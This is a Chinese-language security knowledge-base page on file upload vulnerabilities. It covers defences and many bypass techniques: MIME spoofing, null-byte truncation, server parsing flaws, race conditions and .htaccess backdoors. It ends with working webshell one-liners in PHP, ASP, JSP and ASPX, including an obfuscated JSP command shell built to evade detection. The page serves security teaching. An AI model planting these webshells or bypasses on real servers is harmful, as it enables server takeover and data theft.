<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>文件上传 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="no-referrer">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="文件上传">文件上传 <a href="#文件上传" class="header-anchor">#</a></h1> <h1 id="文件上传漏洞">文件上传漏洞 <a href="#文件上传漏洞" class="header-anchor">#</a></h1> <h2 id="文件上传漏洞原理">文件上传漏洞原理 <a href="#文件上传漏洞原理" class="header-anchor">#</a></h2> <blockquote><p>一些web应用程序中允许上传图片、视频、头像和许多其他类型的文件到服务器中。</p> <p>文件上传漏洞是指服务端代码对上传文件的类型、内容或存储路径校验不严格，导致攻击者能把可执行的脚本文件上传到服务器的 Web 可访问目录中，再通过 URL 访问该文件，使其中的恶意代码被服务器解析执行。</p></blockquote> <h2 id="危害">危害 <a href="#危害" class="header-anchor">#</a></h2> 
<blockquote><p>非法用户可以利用上传的恶意脚本文件控制整个网站，甚至控制服务器。这个恶意的脚本文件，又被称为WebShell，也可以将WebShell脚本称为一种网页后门，WebShell脚本具有非常强大的功能，比如查看服务器目录、服务器中的文件，执行系统命令等。</p></blockquote> <h2 id="防御">防御 <a href="#防御" class="header-anchor">#</a></h2> <blockquote><ul><li>文件扩展名服务端白名单校验（只能在服务端做；客户端 JavaScript 校验和请求里的 Content-Type 都由攻击者控制，不能作为依据）</li> <li>文件内容服务端校验</li> <li>上传文件重命名（由服务端生成随机文件名并按白名单固定扩展名，不要沿用用户提交的 filename）</li> <li>隐藏上传文件路径</li> <li>限制相关目录的执行权限，防范WebShell攻击（更稳妥的做法是把上传文件存放在 Web 根目录之外，或通过单独的静态域名输出）</li></ul></blockquote> <h2 id="检测与绕过">检测与绕过 <a href="#检测与绕过" class="header-anchor">#</a></h2> <h3 id="无验证">无验证 <a href="#无验证" class="header-anchor">#</a></h3> <p>直接上传一句话木马或者WebShell脚本即可。</p> <h3 id="客户端检测-javascript检测">客户端检测（Javascript检测） <a href="#客户端检测-javascript检测" class="header-anchor">#</a></h3> <p>在网页上写一段Javascript脚本，校验文件上传的后缀名，有白名单形式也有黑名单形式。如果上传文件的后缀不被允许，则会弹窗告知，此时文件上传的数据包并没有发送到服务端，只是在客户端浏览器使用Javascript对数据包进行检测。</p> <p>这时有两种方法可以绕过客户端Javascript的检测：</p> <blockquote><ul><li>使用浏览器插件，删除检测文件后缀的Javascript代码，然后上传文件即可绕过</li> <li>首先把需要上传的文件后缀改成允许上传的文件类型，如jpg、png、gif等，绕过Javascript检测，再抓包，把后缀名改成可执行文件的后缀即可上传成功</li></ul></blockquote> <h3 id="服务端检测-mine类型检测">服务端检测（MIME类型检测） <a href="#服务端检测-mine类型检测" class="header-anchor">#</a></h3> <blockquote><p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。</p></blockquote> <p>服务器代码判断<code>$_FILES[&quot;file&quot;][&quot;type&quot;]</code>是不是图片格式（<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>），如果不是，则不允许上传该文件。需要注意，<code>$_FILES[...][&quot;type&quot;]</code>直接取自请求体中该 multipart 分段的 <code>Content-Type</code> 头，PHP 不会核对它与文件实际内容是否一致，所以这个值完全由客户端决定。</p> <p>绕过方法：</p> <blockquote><p>抓包后更改Content-Type为允许的类型绕过该代码限制，比如将php文件的<code>Content-Type:application/octet-stream</code>修改为<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>等就可以</p></blockquote> <p>常见MIMETYPE</p> <blockquote><p>audio/mpeg -&gt; .mp3
application/msword -&gt; .doc
application/octet-stream -&gt; .exe
application/pdf -&gt; .pdf
application/x-javascript -&gt; .js
application/x-rar -&gt; .rar
application/zip -&gt; .zip
image/gif -&gt; .gif
image/jpeg -&gt; .jpg / .jpeg
image/png -&gt; .png
text/plain -&gt; .txt
text/html -&gt; .html
video/mp4 -&gt; .mp4</p></blockquote> <h3 id="服务端检测-目录路径检测">服务端检测（目录路径检测） <a href="#服务端检测-目录路径检测" class="header-anchor">#</a></h3> <p>对目录路径的检测不够严谨而导致可以使用%00截断绕过进行攻击（前提条件见下文“文件截断绕过攻击”）。</p> <p>绕过方法:</p> <blockquote><ul><li>例如：/111.php%00.gif/111.gif  -&gt;  /111.php</li></ul></blockquote> <h3 id="服务端检测-文件扩展名检测">服务端检测（文件扩展名检测） <a href="#服务端检测-文件扩展名检测" class="header-anchor">#</a></h3> <p>绕过方法：</p> <blockquote><ul><li>文件名大小写绕过（针对区分大小写的黑名单），如：<code>*.pHp</code> <code>*.aSP</code></li> <li>文件名双写绕过（针对把敏感后缀替换为空、且只替换一次的过滤），如：<code>*.pphphp</code></li> <li>Unicode： 当目标存在json_decode且检查在json_decode之前,可以将php写为<code>\u0070hp</code></li> <li>名单列表绕过，如：<code>*.asa</code> <code>*.cer</code></li> <li>特殊文件名绕过，比如 Windows 保存文件时会自动去掉文件名末尾的 . 或空格，可设为<code>*.php.</code>或<code>*.php+</code>（<code>+</code> 处实际为空格）：黑名单看到的是陌生后缀，落盘后文件名又变回<code>*.php</code></li> <li>0x00截断绕过，比如：<code>*.php(0x00).jpg</code> 或  <code>*.php%00.jpg</code></li> <li>文件包含漏洞</li> <li>服务器解析漏洞</li> <li>.htaccess文件攻击</li></ul></blockquote> <h3 id="文件截断绕过攻击">文件截断绕过攻击 <a href="#文件截断绕过攻击" class="header-anchor">#</a></h3> <blockquote><p>截断类型：PHP%00截断</p> <p>截断原理：PHP 把路径原样传给底层 C 的文件系统函数，而 C 字符串以 0x00 作为结束符，所以 0x00 之后的所有字符都会被忽略</p> <p>截断条件：PHP版本小于5.3.4（5.3.4 起含空字节的路径会被直接判为非法），且PHP的magic_quotes_gpc为OFF状态</p></blockquote> <p>绕过方法：</p> <blockquote><ul><li>例如上传文件shell.php，上传文件路径为/?upload=shell.php</li> <li>绕过：/?upload=shell.php%00.jpg -&gt; /?upload=shell.php</li></ul></blockquote> <h3 id="解析漏洞攻击">解析漏洞攻击 <a href="#解析漏洞攻击" class="header-anchor">#</a></h3> <p>主要有目录解析、文件解析，Apache解析漏洞、Nginx解析漏洞、IIS7.5解析漏洞。</p> <h4 id="目录解析">目录解析 <a href="#目录解析" class="header-anchor">#</a></h4> <blockquote><ul><li>形式：<code>www.xxx.com/xxx.asp/xxx.jpg</code></li> <li>原理：服务器（典型为 IIS 6.0）会把名字以 <code>.asp</code> 结尾的目录下的所有文件都当作asp文件解析</li></ul></blockquote> <h4 id="文件解析">文件解析 <a href="#文件解析" class="header-anchor">#</a></h4> <blockquote><ul><li>形式：<code>www.xxx.com/xxx.asp;.jpg</code></li> <li>原理：服务器（典型为 IIS 6.0）默认不解析<code>;</code>后面的内容，因此<code>xxx.asp;.jpg</code>被解析为<code>xxx.asp</code>文件了</li></ul></blockquote> <h4 id="apache解析漏洞">Apache解析漏洞 <a href="#apache解析漏洞" class="header-anchor">#</a></h4> 
<p>服务器代码中限制了某些后缀的文件不允许上传，但是有些Apache是允许解析其它后缀的，例如在httpd.conf中如果配置有如下代码，则能够解析php和phtml文件</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>AddType application/x-httpd-php .php .phtml
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>常用后缀：<code>*.php</code> <code>*.php3</code> <code>*.php4</code> <code>*.php5</code> <code>*.phtml</code> <code>*.pht</code></p> <p>在Apache的解析顺序中，是从右到左开始解析文件后缀的，如果最右侧的扩展名不可识别，就继续往左判断，直到遇到可以解析的文件后缀为止。因此，例如上传的文件名为1.php.xxxx，因为后缀xxxx不可解析，所以向左解析后缀php。需要注意：这是 mod_mime 对“多后缀文件”的处理方式，只有在 PHP 通过 <code>AddType</code>/<code>AddHandler</code> 按后缀绑定时才成立；如果 PHP 是用 <code>&lt;FilesMatch &quot;\.php$&quot;&gt;</code> 加 <code>SetHandler</code> 精确匹配文件名结尾（现在多数发行版的默认配置），<code>1.php.xxxx</code> 不会被当作 PHP 执行，测试前应先确认目标的绑定方式。</p> <blockquote><ul><li>例如：<code>shell.php.qwe.asd</code> -&gt;<code>shell.php</code></li></ul></blockquote> <h4 id="nginx解析漏洞">Nginx解析漏洞 <a href="#nginx解析漏洞" class="header-anchor">#</a></h4> <blockquote><p>Nginx默认是以FastCGI的方式把请求交给PHP（php-fpm/php-cgi）解析的，普遍的做法是在Nginx配置文件中通过 正则匹配设置<strong>SCRIPT_FILENAME</strong>。当访问<code>www.xxx.com/phpinfo.jpg/1.php</code>这个 URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成 SCRIPT_FILENAME传递给PHP CGI。</p> <p>原因是 php.ini 中的 <strong>cgi.fix_pathinfo</strong> 为 1（默认值），PHP 会沿着 SCRIPT_FILENAME 从左到右寻找第一个真实存在的文件，于是触发如下逻辑：
PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会 将phpinfo.jpg作为PHP文件来解析了。修复方式是让 Nginx 在转发前先确认文件存在（在 php 的 location 中加 <code>try_files $uri =404</code>），或在 php-fpm 中设置 <code>security.limit_extensions = .php</code>；单纯把 cgi.fix_pathinfo 设为 0 也能堵住，但会影响依赖 PATH_INFO 的应用。</p></blockquote> <p>攻击方式</p> <blockquote><ul><li>形式： <code>www.xxxx.com/UploadFiles/image/1.jpg/1.php</code> <code>www.xxxx.com/UploadFiles/image/1.jpg%00.php</code> <code>www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php</code></li> <li>另一种方法：上传一个名字为test.jpg、内容是“往当前目录写出 shell.php”的 PHP 代码的文件，然后访问<code>test.jpg/.php</code>，test.jpg 会被当作 PHP 执行，从而在该目录下生成一句话木马shell.php（图片本身必须带有写文件的代码，否则不会凭空生成）。</li></ul></blockquote> <h4 id="iis7-5解析漏洞">IIS7.5解析漏洞 <a href="#iis7-5解析漏洞" class="header-anchor">#</a></h4> <blockquote><p>IIS7.5的漏洞与nginx的类似，都是由于php配置文件中，开启了 <strong>cgi.fix_pathinfo</strong>，而这并不是nginx或者iis7.5本身的漏洞。</p></blockquote> <h3 id="竞争条件攻击">竞争条件攻击 <a href="#竞争条件攻击" class="header-anchor">#</a></h3> <p>一些网站上传文件的逻辑是先允许上传任意文件并写入 Web 目录，然后再检查上传的文件是否包含WebShell脚本，如果包含则删除该文件。这里存在的问题是文件落地成功到被删除之间存在一个短暂的时间差（因为需要执行检查文件和删除文件的操作），攻击者可以利用这个时间差完成竞争条件的上传漏洞攻击——实际操作时通常用脚本或 Burp Intruder 并发、反复地发送“上传 1.php”和“访问 1.php”两类请求，直到命中时间窗。防御：先把文件写到 Web 根目录之外的临时目录完成校验，通过后再移动到目标位置，不要采用“先落地后删除”的流程。</p> <p>攻击方法：</p> <blockquote><ul><li>攻击者需要先上传一个WebShell脚本1.php，1.php的内容为生成一个新的WebShell脚本shell.php，1.php写入如下代码</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?php
	fputs(fopen(&quot;../shell.php&quot;, &quot;w&quot;), '&lt;?php @eval($_POST[&quot;cmd&quot;]); ?&gt;');
?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><ul><li>当1.php上传完成后，客户端立即访问1.php，则会在服务端生成shell.php（按上面代码写的是 <code>../shell.php</code>，即上传目录的上一级；要落在当前目录就把路径改成 <code>shell.php</code>），这时攻击者就利用了时间差完成了WebShell的上传</li></ul></blockquote> <h3 id="双文件上传">双文件上传 <a href="#双文件上传" class="header-anchor">#</a></h3> <p>本意为上传两个或多个文件去突破。上传点支持多文件上传，但是却只对第一个文件做了过滤。</p> <p>利用方式：</p> <blockquote><ul><li>在存在双文件上传漏洞的页面中，查看上传的页面。F12找到上传的post表单，action属性是指定上传检测页面，一般是写的绝对路径，比如：<code>xxx.asp/xxx.php</code></li> <li>补全url：<code>https://www.xxx.com/xxx.php(asp)</code></li> <li>构造本地post提交表单</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;form action=&quot;https://www.xxx.com/xxx.asp(php)&quot; method=&quot;post&quot;
name=&quot;form1&quot; enctype=&quot;multipart/form‐data&quot;&gt;
&lt;input name=&quot;FileName1&quot; type=&quot;FILE&quot; class=&quot;tx1&quot; size=&quot;40&quot;&gt;
&lt;input name=&quot;FileName2&quot; type=&quot;FILE&quot; class=&quot;tx1&quot; size=&quot;40&quot;&gt;
&lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;上传&quot;&gt;
&lt;/form&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>利用时只需要修改action的值为指定上传页面即可</p> <ul><li>第一个文件上传允许的文件类型（<code>.jpg</code> <code>.png</code> <code>.gif</code> 等），第二个上传文件是一句话木马或者WebShell脚本。这样就可以突破上传限制，成功上传木马到服务器。</li></ul></blockquote> <h3 id="php3457">php3457 <a href="#php3457" class="header-anchor">#</a></h3> <blockquote><p>该项为apache专属。关键点在<code>/etc/apache2/mods-available/php5.6.conf</code>这个文件（Debian/Ubuntu 的 libapache2-mod-php 包提供），满足<code>.+\.ph(p[3457]?|t|tml)$</code>，都会被当作php文件解析。不同 PHP 版本这条正则并不相同（较新的 php7.x/php8.x 配置一般只匹配 .php/.phtml/.phar，不再包含 php3/4/5），所以不要照搬这个列表。</p> <p>在apache2目录下<code>grep -r x-httpd-php /etc/apache2</code>找到对应文件就能知道解析哪些后缀，以实际 grep 结果为准。</p></blockquote> <h3 id="htaccess文件攻击">.htaccess文件攻击 <a href="#htaccess文件攻击" class="header-anchor">#</a></h3> <blockquote><p>.htaccess文件(或者&quot;分布式配置文件&quot;）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。</p> <p>概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。</p> <p>启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。</p> <p>笼统地说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。</p></blockquote> <p>一般<code>.htaccess</code>可以用来留后门和针对黑名单绕过。把<code>.htaccess</code>上传到上传目录即可（它作用于所在目录及其子目录）。前提条件：目标是 Apache（Nginx/IIS 不识别 .htaccess），该目录的 AllowOverride 允许 FileInfo 或 All，且 PHP 以 mod_php 方式运行——php-fpm 模式下 <code>AddType application/x-httpd-php</code> 通常不会把文件交给 PHP，<code>php_value</code> 之类指令甚至会因为无法识别而导致 500。</p> <p>绕过方法：</p> <blockquote><ul><li>针对黑名单绕过</li></ul> <p>创建一个txt文件，写入</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>AddType  application/x-httpd-php    .png
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>另存为 <code>.htaccess</code> 名称，保存类型为所有文件，即可将<code>png</code>文件解析为<code>php</code>文件。</p> <ul><li>留后门</li></ul> <p>在<code>.htaccess</code> 内写入<code>php</code>解析规则，类似于把文件名包含<code>s</code>的解析成<code>php</code>文件</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;FilesMatch &quot;s&quot;&gt;
SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><code>shell.png</code> 就会以<code>php</code>文件执行</p> <ul><li>利用.htaccess进行文件包含</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>php_value auto_prepend_file &quot;.htaccess&quot;
#&lt;?php eval($_POST[cmd]);?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><ul><li>使用#注释使得.htaccess能够成功解析：Apache 把以 <code>#</code> 开头的行当作注释，不会报配置错误；而 PHP 通过 auto_prepend_file 包含 .htaccess 时，<code>&lt;?php</code> 之前的 <code>php_value ...</code> 和 <code>#</code> 只是被原样输出的普通文本，<code>&lt;?php</code> 之后的代码照常执行，于是同一个文件既是合法的 .htaccess 又是 PHP 后门（同样依赖 mod_php）</li></ul></blockquote> <h3 id="服务器检测-文件内容检测">服务器检测（文件内容检测） <a href="#服务器检测-文件内容检测" class="header-anchor">#</a></h3> <h4 id="文件幻数检测-文件开头">文件幻数检测（文件开头） <a href="#文件幻数检测-文件开头" class="header-anchor">#</a></h4> <blockquote><p>幻数 magic number，它可以用来标记文件或者协议的格式，很多文件都有幻数标志来表明该文件的格式。</p></blockquote> <p>要绕过文件幻数检测就要在文件开头写上如下的值（JPEG 真正必须的只有前 3 字节 <code>FF D8 FF</code>，后面是 JFIF 的 APP0 段）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>.jpg	FF D8 FF E0 00 10 4A 46 49 46
.gif	47 49 46 38 39 61
.png	89 50 4E 47 0D 0A 1A 0A
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>在文件幻数后面加上自己的WebShell代码就行</p> <h4 id="文件相关信息检测">文件相关信息检测 <a href="#文件相关信息检测" class="header-anchor">#</a></h4> <p>图像文件相关信息检测常用的是getimagesize()函数，需要把文件头部分伪造，也就是在幻数的基础上还加了一些文件信息（尺寸、色深等）。getimagesize() 只解析图片头部，不会校验文件其余内容，所以头部之后附带的 PHP 代码并不影响它返回图片信息。</p> <blockquote><ul><li>例如下面结构</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>GIF89a
(...some binary data for image...)
&lt;?php phpinfo(); ?&gt;
(... skipping the rest of binary data ...)
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div></blockquote> <p>另一种是判断是否包含<code>&lt;?</code>或者<code>php</code></p> <blockquote><ul><li><p>绕过<code>&lt;?</code>（仅对 PHP 7.0 之前的版本有效，PHP 7 已移除 <code>&lt;script language=&quot;php&quot;&gt;</code> 这种标签）：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script language='php'&gt;@eval($_POST[cmd]);&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li> <li><p>绕过<code>php</code>：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?= @eval($_POST['cmd']);?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li></ul></blockquote> <p>绕过方法：</p> <blockquote><ul><li>对渲染/加载测试的攻击方式是代码注入绕过。使用winhex在不破坏文件本身的渲染情况下找一个空白区进行填充代码，一般为图片的注释区。</li> <li>对二次渲染的攻击方式就是攻击文件加载器自身。例如：</li></ul> <div class="language- line-numbers-mode"><pre class="language-text"><code>上传文件数据不完整的gif文件 -&gt; 触发报错imagecreatefromgif()函数
上传文件数据不完整的png文件 -&gt; 触发报错imagecreatefrompng()函数
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>某后台调用GD库对图像进行二次渲染的代码</p> <div class="language- line-numbers-mode"><pre class="language-text"><code> function image_gd_open($file, $extension)
 {
 $extension = str_replace('jpg', 'jpeg', $extension);
 $open_func = 'imageCreateFrom'. $extension; //函数名变成imageCreateFrompng 之类
 if (!function_exists($open_func))
 {
 	return FALSE;
 }
 return $open_func($file); //变成imagecreatefrompng('/tmp/phpimage')
 }
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><ul><li>对文件加载器进行攻击，常见的就是溢出攻击。上传自己的恶意文件后，服务器上的文件加载器会主动进行加载测试，加载测试时被溢出攻击执行shellcode，比如access/mdb溢出。</li></ul></blockquote> <h3 id="文件上传中的目录穿越漏洞">文件上传中的目录穿越漏洞 <a href="#文件上传中的目录穿越漏洞" class="header-anchor">#</a></h3> <p>攻击方式</p> <blockquote><p>形式：上传的文件只被当作数据记录（例如写入日志）而不能执行，但服务端把用户提交的 filename 直接拼接到<code>/uploads/</code>后面，并提供了按路径查询/读取的功能</p> <p>绕过：上传文件的时候抓包，修改文件名（filename）为<code>./../../../../flag</code>，上传成功后路径变为<code>/uploads/./../../../../flag</code>即可穿越到上传目录之外读写文件。防御：服务端只取 basename() 或自行生成文件名，并在拼接后校验 realpath 仍位于上传目录内。</p></blockquote> <h2 id="攻击代码">攻击代码 <a href="#攻击代码" class="header-anchor">#</a></h2> <h3 id="常用攻击代码">常用攻击代码 <a href="#常用攻击代码" class="header-anchor">#</a></h3> <blockquote><p>简单的一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?php @eval($_POST['cmd']);?&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>绕过<code>&lt;?</code>限制的一句话木马（仅适用于 PHP 7.0 之前的版本）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script language = 'php'&gt;@eval($_POST[cmd]);&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>绕过<code>&lt;?php ?&gt;</code>限制的一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;?= @eval($_POST['cmd']);
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>asp一句话木马（JScript 语法，页面需以 JScript 作为脚本语言）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;%eval(Request.Item[&quot;cmd&quot;],&quot;unsafe&quot;);%&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>JSP一句话木马</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;%if(request.getParameter(&quot;f&quot;)!=null)(newjava.io.FileOutputStream (application.getRealPath(&quot;\\&quot;)+request.getParameter(&quot;f&quot;))).write (request.getParameter(&quot;t&quot;).getBytes());%&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>JSP一句话免杀（ASCII编码：把 <code>java.lang.Runtime</code>、<code>getRuntime</code>、<code>exec</code> 等敏感字符串用字节数组拼出来，以躲避基于关键字的静态检测）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;%@ page contentType=&quot;text/html;charset=UTF-8&quot;  language=&quot;java&quot; %&gt;
&lt;%
    if(request.getParameter(&quot;cmd&quot;)!=null){
        Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
        Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null), request.getParameter(&quot;cmd&quot;) );
        java.io.InputStream in = e.getInputStream();
        int a = -1;byte[] b = new byte[2048];out.print(&quot;&lt;pre&gt;&quot;);
        while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print(&quot;&lt;/pre&gt;&quot;);
    }
%&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>ASPX一句话</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script language=&quot;C#&quot;runat=&quot;server&quot;&gt;WebAdmin2Y.x.y a=new WebAdmin2Y.x.y(&quot;add6bb58e139be10&quot;)&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></blockquote> <h3 id="其它攻击代码">其它攻击代码 <a href="#其它攻击代码" class="header-anchor">#</a></h3> <blockquote><p>异或取反等操作写shell的php脚本、混淆木马、不死马。</p></blockquote> <h2 id="更多参考">更多参考 <a href="#更多参考" class="header-anchor">#</a></h2> <p>https://bbs.ichunqiu.com/thread-41672-1-1.html?from=sec</p> <p>https://www.freebuf.com/articles/web/253698.html</p> <p>https://www.freebuf.com/articles/web/179954.html</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/ctf/php-serialize.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/48.59af224e.js" defer></script>
  </body>
</html>